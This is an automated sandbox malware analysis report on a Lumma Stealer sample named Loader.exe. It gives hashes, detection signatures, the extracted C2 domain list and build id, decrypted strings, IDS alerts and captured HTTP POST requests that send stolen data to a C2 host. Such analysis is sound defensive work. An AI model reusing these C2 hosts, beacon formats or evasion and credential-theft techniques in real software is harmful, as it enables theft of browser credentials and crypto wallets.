Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1581511
MD5:7773630abc9d30d9e4fb74481736224c
SHA1:960bcdda71ed3b4bef604dc549cdf4a0f84c4636
SHA256:3cac35e6047f481ebf1530b5e63e9ad9846963dea7238351770dd6f21b846711
Tags:exeLummaStealeruser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 7773630ABC9D30D9E4FB74481736224C)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 7773630ABC9D30D9E4FB74481736224C)
    • Loader.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 7773630ABC9D30D9E4FB74481736224C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["appliacnesot.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "screwamusresz.buzz", "inherineau.buzz", "undesirabkel.click", "hummskitnj.buzz", "prisonyfork.buzz", "scentniej.buzz"], "Build id": "LPnhqo--yxojbtuqnnxf"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Loader.exe PID: 7408JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Loader.exe PID: 7408JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Loader.exe PID: 7408JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:26:58.822905+010020283713Unknown Traffic192.168.2.449730104.21.30.13443TCP
              2024-12-27T23:27:00.794201+010020283713Unknown Traffic192.168.2.449731104.21.30.13443TCP
              2024-12-27T23:27:03.254522+010020283713Unknown Traffic192.168.2.449732104.21.30.13443TCP
              2024-12-27T23:27:07.941464+010020283713Unknown Traffic192.168.2.449733104.21.30.13443TCP
              2024-12-27T23:27:10.195422+010020283713Unknown Traffic192.168.2.449734104.21.30.13443TCP
              2024-12-27T23:27:12.836751+010020283713Unknown Traffic192.168.2.449735104.21.30.13443TCP
              2024-12-27T23:27:15.839085+010020283713Unknown Traffic192.168.2.449737104.21.30.13443TCP
              2024-12-27T23:27:20.017873+010020283713Unknown Traffic192.168.2.449741104.21.30.13443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:26:59.564081+010020546531A Network Trojan was detected192.168.2.449730104.21.30.13443TCP
              2024-12-27T23:27:01.586988+010020546531A Network Trojan was detected192.168.2.449731104.21.30.13443TCP
              2024-12-27T23:27:20.785675+010020546531A Network Trojan was detected192.168.2.449741104.21.30.13443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:26:59.564081+010020498361A Network Trojan was detected192.168.2.449730104.21.30.13443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:27:01.586988+010020498121A Network Trojan was detected192.168.2.449731104.21.30.13443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:26:58.822905+010020585511Domain Observed Used for C2 Detected192.168.2.449730104.21.30.13443TCP
              2024-12-27T23:27:00.794201+010020585511Domain Observed Used for C2 Detected192.168.2.449731104.21.30.13443TCP
              2024-12-27T23:27:03.254522+010020585511Domain Observed Used for C2 Detected192.168.2.449732104.21.30.13443TCP
              2024-12-27T23:27:07.941464+010020585511Domain Observed Used for C2 Detected192.168.2.449733104.21.30.13443TCP
              2024-12-27T23:27:10.195422+010020585511Domain Observed Used for C2 Detected192.168.2.449734104.21.30.13443TCP
              2024-12-27T23:27:12.836751+010020585511Domain Observed Used for C2 Detected192.168.2.449735104.21.30.13443TCP
              2024-12-27T23:27:15.839085+010020585511Domain Observed Used for C2 Detected192.168.2.449737104.21.30.13443TCP
              2024-12-27T23:27:20.017873+010020585511Domain Observed Used for C2 Detected192.168.2.449741104.21.30.13443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:26:57.370528+010020585501Domain Observed Used for C2 Detected192.168.2.4647221.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T23:27:06.637591+010020480941Malware Command and Control Activity Detected192.168.2.449732104.21.30.13443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://undesirabkel.click/apibV7RydFqE=Avira URL Cloud: Label: malware
              Source: https://undesirabkel.click:443/apiGAvira URL Cloud: Label: malware
              Source: undesirabkel.clickAvira URL Cloud: Label: malware
              Source: https://undesirabkel.click/apiAvira URL Cloud: Label: malware
              Source: https://undesirabkel.click/apiCAvira URL Cloud: Label: malware
              Source: https://undesirabkel.click/Avira URL Cloud: Label: malware
              Source: https://undesirabkel.click/apiiAvira URL Cloud: Label: malware
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "screwamusresz.buzz", "inherineau.buzz", "undesirabkel.click", "hummskitnj.buzz", "prisonyfork.buzz", "scentniej.buzz"], "Build id": "LPnhqo--yxojbtuqnnxf"}
              Source: Loader.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: undesirabkel.click
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString decryptor: LPnhqo--yxojbtuqnnxf
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00922560 GetCurrentThreadId,CryptEncrypt,CryptDestroyKey,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,0_2_00922560
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00922560 GetCurrentThreadId,CryptEncrypt,CryptDestroyKey,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,2_2_00922560
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415200 CryptUnprotectData,3_2_00415200
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_009420D9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009420D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00942028 FindFirstFileExW,0_2_00942028
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_009420D9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_009420D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00942028 FindFirstFileExW,2_2_00942028
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0000026Dh]3_2_00415200
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+70h]3_2_00409370
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00409370
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0043F39E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_00440CE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 798ECF08h3_2_00439490
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h3_2_00439490
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+446E8726h]3_2_00441DA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h3_2_00440E00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]3_2_004396A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-4835D6BBh]3_2_0040D7CF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h3_2_0041D050
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041780D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h3_2_004410D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2Ch]3_2_0042788F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, dword ptr [ebp-10h]3_2_0041C900
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042B100
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00427917
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then test eax, eax3_2_0043A120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+338E7E12h]3_2_0043A120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax3_2_00405930
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax3_2_00405930
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]3_2_0043A9D6
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then sub edx, 01h3_2_004409E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx]3_2_00426190
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx]3_2_0043E9B3
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2Ch]3_2_00427A3F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0041F2C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004292E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-535229ACh]3_2_004402B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then sub edx, 01h3_2_004402B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B70
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00436370
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, ecx3_2_00408B00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D306
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [00448B7Ch]3_2_00428307
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi-6Fh]3_2_004393C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-535229ACh]3_2_004403D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then sub edx, 01h3_2_004403D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h]3_2_0042BBE3
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h]3_2_0042BC53
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000258h]3_2_0043EC60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00416C77
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D4D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-53h]3_2_00419C90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00419C90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D49A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004074A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004074A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h]3_2_0042BB19
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then sub edx, 01h3_2_00440550
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041C561
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+26h]3_2_0041C561
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041C561
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [eax]3_2_00426513
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00425DEA
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00425DEA
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h3_2_0043A640
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D64C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-38h]3_2_0043EE50
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042A660
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_0041966B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00425E70
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then sub edx, 01h3_2_00440600
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], EABBD981h3_2_0040DE13
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00417E1A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax3_2_00417E1A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2DC31920h]3_2_00422E3F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00422E3F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+74842D10h]3_2_00422E3F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then sub edx, 01h3_2_00440690
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5B5F0E69h]3_2_004146A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, ecx3_2_004146A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_004146A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00426EB0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0040A770
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push eax3_2_00415F19
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, edx3_2_004227E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_00416790
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_00416790
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ebx3_2_0040B79B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx]3_2_0041E7A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx ecx, byte ptr [edi+eax]3_2_0043F7B2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49735 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49733 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49741 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49732 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:64722 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49734 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49731 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49730 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49737 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.30.13:443
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: undesirabkel.click
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.30.13:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.30.13:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M91SY52IFTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OKFWFD1CV0UIFBA85V7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8797Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XAUBSJLSPWTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XYJVGHQPA055X9ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OTJ1QCSBXYCPIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569678Host: undesirabkel.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: undesirabkel.click
